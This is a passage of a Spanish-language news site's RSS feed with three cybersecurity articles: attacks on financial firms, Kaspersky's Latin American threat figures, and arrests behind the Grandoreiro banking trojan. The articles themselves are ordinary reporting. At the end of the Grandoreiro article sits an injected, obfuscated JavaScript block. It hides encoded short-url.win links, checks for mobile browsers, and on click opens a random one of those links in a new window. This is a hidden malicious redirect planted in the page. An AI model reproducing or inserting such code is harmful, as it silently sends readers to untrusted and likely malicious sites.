					<description><![CDATA[<p><img width="951" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2025/01/CloudLegion_El-53_-de-las-empresas-financieras-y-de-seguros-sufrieron-ciberataques-en-los-ultimos-tres-meses.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Ciberataques en finanzas: 53% de empresas afectada" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/01/CloudLegion_El-53_-de-las-empresas-financieras-y-de-seguros-sufrieron-ciberataques-en-los-ultimos-tres-meses.jpg?w=951&amp;ssl=1 951w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/01/CloudLegion_El-53_-de-las-empresas-financieras-y-de-seguros-sufrieron-ciberataques-en-los-ultimos-tres-meses.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/01/CloudLegion_El-53_-de-las-empresas-financieras-y-de-seguros-sufrieron-ciberataques-en-los-ultimos-tres-meses.jpg?resize=504%2C336&amp;ssl=1 504w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/01/CloudLegion_El-53_-de-las-empresas-financieras-y-de-seguros-sufrieron-ciberataques-en-los-ultimos-tres-meses.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/01/CloudLegion_El-53_-de-las-empresas-financieras-y-de-seguros-sufrieron-ciberataques-en-los-ultimos-tres-meses.jpg?resize=630%2C420&amp;ssl=1 630w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/01/CloudLegion_El-53_-de-las-empresas-financieras-y-de-seguros-sufrieron-ciberataques-en-los-ultimos-tres-meses.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/01/CloudLegion_El-53_-de-las-empresas-financieras-y-de-seguros-sufrieron-ciberataques-en-los-ultimos-tres-meses.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 951px) 100vw, 951px" /></p><!-- wp:paragraph -->
<p>La industria financiera y de seguros enfrenta una ola de <strong>ciberataques</strong> sin precedentes. La creciente adopción de <strong>la nube</strong> y el avance de la <strong>inteligencia artificial (IA)</strong> han ampliado la superficie de exposición, generando nuevos riesgos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Según un informe de <strong>Tenable</strong>, empresa especializada en <strong>ciberseguridad</strong>, el <strong>53% de las entidades financieras</strong> sufrieron ataques en los últimos tres meses. En paralelo, <strong>Deloitte</strong> estima que la <strong>IA generativa</strong> hará que las pérdidas por fraude aumenten un <strong>32% anual hasta 2027</strong>, alcanzando los <strong>US$40.000 millones</strong> solo en <strong>Estados Unidos</strong>. Además, los incidentes con <strong>deep fakes</strong> en el sector <strong>fintech</strong> crecieron un <strong>700% en 2023</strong>.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">Desafíos en la seguridad de la nube</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Según los expertos de <strong>Cloud Legion</strong>, las entidades financieras y de seguros enfrentan tres grandes retos en materia de <strong>seguridad cibernética</strong>:</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">1. Proteger datos con estrategias efectivas</h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Los datos sensibles requieren un <strong>estricto control de riesgos</strong> y un monitoreo continuo para evitar vulnerabilidades.</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">2. Equilibrar seguridad y funcionalidad</h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>La estrategia de <strong>ciberseguridad</strong> no debe afectar la operación del negocio ni la experiencia del cliente.</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">3. Escasez de talento especializado</h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>El <strong>95% de las organizaciones</strong> reconoce falta de experiencia en <strong>seguridad de la nube</strong>, lo que complica la protección de sus infraestructuras.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">El papel clave de los socios tecnológicos</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Para <strong>Christian Ibiri</strong>, CEO de <strong>Cloud Legion</strong>, el gran problema radica en <strong>identidades inseguras y errores de configuración</strong>. "<em>Los principales riesgos para la infraestructura de nube suelen ser las identidades inseguras y los problemas de configuración. Por eso, resulta fundamental el acompañamiento de un socio tecnológico experto, que conozca en profundidad tanto la industria como las nuevas tecnologías, que evite esos problemas comunes y que, además, pueda anticipar las próximas jugadas de los ciberatacantes</em>", concluye.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">Conclusión</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>El sector financiero debe reforzar sus estrategias de <strong>ciberseguridad</strong> para enfrentar las amenazas actuales. La combinación de <strong>inteligencia artificial</strong>, adopción de <strong>la nube</strong> y la falta de personal capacitado hacen que la seguridad digital sea un desafío crítico. Contar con <strong>socios tecnológicos</strong> especializados y adoptar estrategias proactivas puede marcar la diferencia en la protección de los datos y la confianza de los clientes.</p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/ciberataques-en-finanzas-53-de-empresas-afectada/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">99979</post-id>	</item>
		<item>
		<title>Kaspersky: Empresas de América Latina enfrentaron más de 268 millones de ataques en un año</title>
		<link>https://www.todoenunclick.com/kaspersky-empresas-de-america-latina-enfrentaron-mas-de-268-millones-de-ataques-en-un-ano/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Tue, 17 Dec 2024 12:29:07 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[ataques]]></category>
		<category><![CDATA[ciberamenazas]]></category>
		<category><![CDATA[empresas]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[Ransomware]]></category>
		<category><![CDATA[troyanos bancarios]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=99809</guid>

					<description><![CDATA[<p><img width="1200" height="800" src="https://www.todoenunclick.com/wp-content/uploads/2024/12/Empresas_.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/12/Empresas_.jpg?w=1200&amp;ssl=1 1200w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/12/Empresas_.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/12/Empresas_.jpg?resize=504%2C336&amp;ssl=1 504w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/12/Empresas_.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/12/Empresas_.jpg?resize=630%2C420&amp;ssl=1 630w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/12/Empresas_.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/12/Empresas_.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 1200px) 100vw, 1200px" /></p><!-- wp:paragraph -->
<p>Especialistas de la empresa de ciberseguridad analizan el panorama actual de ataques, destacando las principales amenazas y sectores más afectados, y ofrecen estrategias clave para que las organizaciones fortalezcan su protección y prevengan incidentes críticos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El Panorama de Amenazas Corporativas de Kaspersky revela que el escenario de ciberamenazas para las empresas en América Latina sigue siendo preocupante. Entre octubre de 2023 y octubre de 2024, se bloquearon 268,3 millones de ataques de malware, incluyendo 262,3 millones de intentos de phishing, más de 1,3 millones de troyanos bancarios y alrededor de 560,000 &nbsp;ataques de ransomware. Este panorama refleja la persistente y creciente actividad de los ciberdelincuentes en la región, con un incremento notable en los ataques dirigidos a sectores clave.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Durante el mismo período, <strong><em>en Argentina</em></strong>, se bloquearon 6,6 millones de ataques de malware, incluyendo 5,6 millones de intentos de phishing, más de 12.000 troyanos bancarios y alrededor de 8.000 ataques de ransomware.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Entre los sectores más afectados en la región se encuentran los de Gobierno, Manufactura, Retail, los servicios de IT, así como los sectores de salud y educación. Estos sectores, debido a su naturaleza y al tipo de información que gestionan, se han convertido en objetivos atractivos para los atacantes, quienes buscan vulnerar sistemas con el fin de obtener información valiosa o paralizar la operación de las organizaciones.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Principales amenazas detectadas</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El phishing continúa siendo una amenaza común en América Latina, con más de 721,000 bloqueos diarios, debido a su simplicidad y alta efectividad. Esta técnica es especialmente utilizada en fraudes bancarios y para el robo de información corporativa, representando uno de los mayores desafíos para las empresas. Por otro lado, el ransomware, que cifra datos y exige un rescate para liberarlos, registró más de 560,000 ataques en un año en la región, un promedio de 840 diarios. Aunque los ataques masivos habían disminuido, los ciberdelincuentes ahora optan por estrategias más dirigidas y personalizadas, enfocándose en sectores específicos, lo que les permite exigir rescates mayores al comprometer información crítica o interrumpir operaciones esenciales.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Los troyanos bancarios, diseñados para robar credenciales y realizar fraudes en banca en línea, sumaron 1,3 millones de intentos en el mismo período, equivalentes a alrededor de 3,500 ataques diarios. En 2024, Kaspersky trabajó junto con la Interpol y la Policía Federal de Brasil, logrando desarticular a miembros del grupo detrás del troyano Grandoreiro en abril. Sin embargo, pese a estos avances, los ciberdelincuentes se han reorganizado, manteniendo la amenaza activa y constante en la región.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“El panorama de amenazas digitales sigue expandiéndose, colocando a empresas de todos los tamaños en un nivel de riesgo sin precedentes. El incremento en la sofisticación y personalización de los ataques, como el ransomware, subraya la urgencia de que las organizaciones prioricen la seguridad digital. Afortunadamente, las tecnologías y soluciones avanzadas, combinadas con inteligencia de amenazas y la capacitación de los equipos para reconocer y mitigar posibles crisis, pueden garantizar un nivel óptimo de protección y productividad. La ciberseguridad ya no debe ser vista como una opción, sino como una necesidad crítica para asegurar la continuidad operativa y establecer un diferencial competitivo en el mercado”, </em><strong>asegura Claudio Martinelli, Director General para Américas en Kaspersky.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Los datos de Kaspersky destacan un panorama alarmante de actividad ciberdelincuente dirigido contra empresas, lo que subraya la importancia de contar con medidas efectivas para identificar, bloquear o neutralizar ataques antes de que se conviertan en incidentes críticos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Según el <a href="https://securelist.com/kaspersky-incident-response-report-2023/112504/">Informe de Respuesta a Incidentes 2023</a>, las técnicas más comunes utilizadas por los atacantes, ordenadas de mayor a menor, son los exploits de aplicaciones públicas vulnerables, el uso de credenciales robadas, los ataques de fuerza bruta y los mensajes fraudulentos o phishing. Estos resultados reflejan la creciente sofisticación de las amenazas y la necesidad urgente de que las organizaciones refuercen sus estrategias de ciberseguridad.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En este contexto, y para evitar las vulnerabilidades en las empresas, los expertos de Kaspersky sugieren:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Implementar políticas para el uso de contraseñas seguras: Explicar a los colaboradores la importancia de crear claves complejas que incluyan combinación de letras, números y caracteres especiales, así como pedirles realizar actualizaciones periódicas de las mismas. Habilitar autenticación multifactor en todas las cuentas para añadir una capa adicional de seguridad frente a accesos no autorizados.</strong></li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Capacitación en seguridad:</strong> Educar a los empleados sobre amenazas comunes, como phishing y técnicas de ingeniería social.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Actualizaciones de software:</strong> Aplicar actualizaciones de seguridad para corregir vulnerabilidades conocidas.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Copias de seguridad regulares:</strong> Realizar backups periódicos y almacenarlos de forma segura.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Control de acceso: Implementar el principio de mínimo privilegio, asegurando que los usuarios solo tengan acceso a los recursos estrictamente necesarios para desempeñar sus funciones. Además, configurar sistemas para bloquear automáticamente las cuentas tras varios intentos fallidos de inicio de sesión, reduciendo el riesgo de accesos no autorizados.</strong></li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Protección de endpoints:</strong> Usar soluciones como <a href="https://latam.kaspersky.com/next-edr-foundations">EDR (Detección y Respuesta de Endpoints)</a> para detectar y responder rápidamente a incidentes.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<p><a href="https://www.todoenunclick.com/kaspersky-empresas-de-america-latina-enfrentaron-mas-de-268-millones-de-ataques-en-un-ano/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">99809</post-id>	</item>
		<item>
		<title>Grandoreiro: El malware bancario que azota a Brasil y más</title>
		<link>https://www.todoenunclick.com/grandoreiro-el-malware-bancario-que-azota-a-brasil-y-mas/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Tue, 19 Mar 2024 17:25:28 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[amenazas]]></category>
		<category><![CDATA[ataques]]></category>
		<category><![CDATA[ciberdelincuencia]]></category>
		<category><![CDATA[Ciberdelincuentes]]></category>
		<category><![CDATA[Ciberseguridad]]></category>
		<category><![CDATA[grandoreiro]]></category>
		<category><![CDATA[INTERPOL]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[prevención]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[troyano]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=98630</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2024/03/grandoreiro.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Grandoreiro: El malware bancario que azota a Brasil y más" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/grandoreiro.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/grandoreiro.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/grandoreiro.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/grandoreiro.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/grandoreiro.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/grandoreiro.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/03/grandoreiro.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p>Kaspersky ha colaborado en una acción coordinada por INTERPOL que ha llevado a las autoridades brasileñas a arrestar a cinco administradores que estaban detrás de una operación del troyano bancario Grandoreiro. Según las estimaciones, se cree que los ciberdelincuentes han robado a sus víctimas más de 3,5 millones de euros.

<strong> </strong>Grandoreiro es un troyano bancario de origen brasileño que, según datos de Kaspersky, lleva activo al menos desde 2016. Los ataques realizados a través de este malware suelen comenzar con un correo electrónico de <em>spear-phishing</em> escrito en español, portugués o inglés. Una vez instalado en el dispositivo de la víctima, el troyano rastrea las pulsaciones del teclado, simula la actividad del ratón, comparte pantallas y recopila datos como nombres de usuario, información del sistema operativo, tiempo de ejecución del dispositivo y, lo más importante, identificadores bancarios. Cuando los atacantes se hacen con el <strong>control total de las cuentas bancarias</strong> de las víctimas las vacían, enviando los fondos a través de una red de ‘mulas’ de dinero para el lavado de los ingresos ilícitos.

El troyano cuenta con muchas versiones, lo que podría indicar que diferentes operadores están involucrados en el desarrollo del malware. Según los expertos de Kaspersky, Grandoreiro opera como un proyecto de <strong>Malware-as-a-Service</strong> (MaaS) y tiene como objetivo atacar a más de 900 instituciones financieras en más de 40 países de Europa, Norteamérica y Latinoamérica.

Como parte de esta colaboración, Kaspersky, junto con otros socios privados de INTERPOL, contribuyó al análisis de muestras de malware Grandoreiro, recopiladas por investigaciones de cibercrimen de Brasil y España entre 2020 y 2022. Durante este periodo, <strong>los productos de Kaspersky detectaron 150.000 ataques</strong> con el uso del troyano bancario Grandoreiro en 40.000 usuarios de todo el mundo. España, Brasil, México, Portugal, Argentina y Estados Unidos resultaron ser los países más afectados. Asimismo, en agosto de 2023, se elaboraron informes analíticos que identificaron coincidencias entre las muestras, lo que permitió a los analistas acercarse al grupo de crimen organizado.

<em>“Hemos sido testigos de las campañas de Grandoreiro desde al menos 2016. A lo largo de este tiempo, los atacantes han ido mejorando regularmente sus técnicas, esforzándose por pasar desapercibidos y permanecer activos durante periodos de tiempo más largos. En estas circunstancias, es extremadamente importante que las instituciones financieras se mantengan vigilantes, al tiempo que mejoran sus tecnologías antifraude y sus datos de inteligencia sobre amenazas. Una mayor sinergia entre socios privados y públicos también es fundamental para combatir estos delitos cibernéticos y garantizar un entorno más seguro para usuarios y organizaciones de todo el mundo”, </em>comenta <strong>Fabio Assolini</strong>, <strong>director del Equipo Global de Investigación y Análisis (GReAT) para América Latina en Kaspersky.</strong>

Por su parte, <strong>Craig Jones</strong>, director de la Unidad de Ciberdelincuencia de INTERPOL, subrayó la importancia de un enfoque colectivo: <em>“Este éxito operativo pone de relieve la importancia del intercambio de información policial a través de INTERPOL, y por qué nos hemos comprometido a actuar como puente entre los sectores público y privado. También sienta las bases para una mayor cooperación en la región</em>".

Dado que familias de troyanos, como Grandoreiro, se han expandido activamente en el extranjero, los expertos de Kaspersky esperan ver un aumento en la explotación de troyanos bancarios para móviles. De acuerdo con las <a href="https://securelist.lat/kaspersky-security-bulletin-crimeware-financial-threats-2024/98235/">predicciones de la compañía para el crimeware y las amenazas financieras en 2024</a>, los troyanos bancarios brasileños serán una de las tendencias que dominen el panorama de amenazas financieras este año.
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/grandoreiro-el-malware-bancario-que-azota-a-brasil-y-mas/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">98630</post-id>	</item>
	</channel>
</rss>
